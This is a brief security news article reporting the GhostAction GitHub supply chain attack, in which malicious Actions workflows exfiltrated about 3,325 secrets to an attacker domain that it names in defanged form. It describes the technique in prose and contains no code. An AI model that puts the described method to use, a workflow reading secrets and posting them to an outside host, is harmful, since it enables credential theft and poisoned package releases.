Cybercriminals Compromise 3,325 Sensitive Secrets in GhostAction GitHub Supply Chain Breach

ByAdmin

A new supply chain attack on GitHub, known as ‘GhostAction,’ has compromised approximately 3,325 secrets, including tokens from PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS. The attack was uncovered by researchers at GitGuardian, who first detected signs of compromise in the FastUUID project on September 2, 2025. Attackers exploited compromised maintainer accounts to introduce a malicious GitHub Actions workflow file that activates automatically on ‘push’ or manual dispatch. Once triggered, this workflow reads secrets from the project’s GitHub Actions environment and exfiltrates them to an external domain controlled by the attackers via a curl POST request. In the case of FastUUID, the attackers successfully stole the project’s PyPI token, although no malicious package releases occurred before the compromise was identified and addressed.

Further investigation revealed that the GhostAction campaign was extensive, affecting at least 817 repositories, all of which sent secrets to the same endpoint, ‘bold-dhawan[.]45-139-104-115[.]plesk[.]page.’ The attackers enumerated legitimate secret names from existing workflows and hardcoded them into their own workflows to capture various secret types. Upon discovering the full scope of the attack on September 5, GitGuardian opened issues in 573 impacted repositories and notified the security teams of GitHub, npm, and PyPI. A hundred GitHub repositories had already detected the compromise and reverted the malicious changes. Following the discovery, the exfiltration endpoint ceased to resolve. The researchers noted that at least nine npm and 15 PyPI packages were directly affected, potentially leading to the release of malicious or trojanised versions until maintainers revoke the leaked secrets. GitGuardian’s analysis indicated that compromised tokens spanned multiple package ecosystems, including Rust crates and npm packages, with several companies experiencing complete SDK portfolio compromises across Python, Rust, JavaScript, and Go repositories. Although there were some similarities to the ‘s1ngularity’ campaign from late August, GitGuardian does not believe there is a direct connection between the two operations. 

Categories: Supply Chain Attack, Compromised Secrets, GitHub Security 

Tags: Supply Chain Attack, GhostAction, GitHub, Secrets, Compromise, Malicious Workflow, Exfiltration, PyPI, npm, DockerHub 

Leave a Reply

Your email address will not be published. Required fields are marked *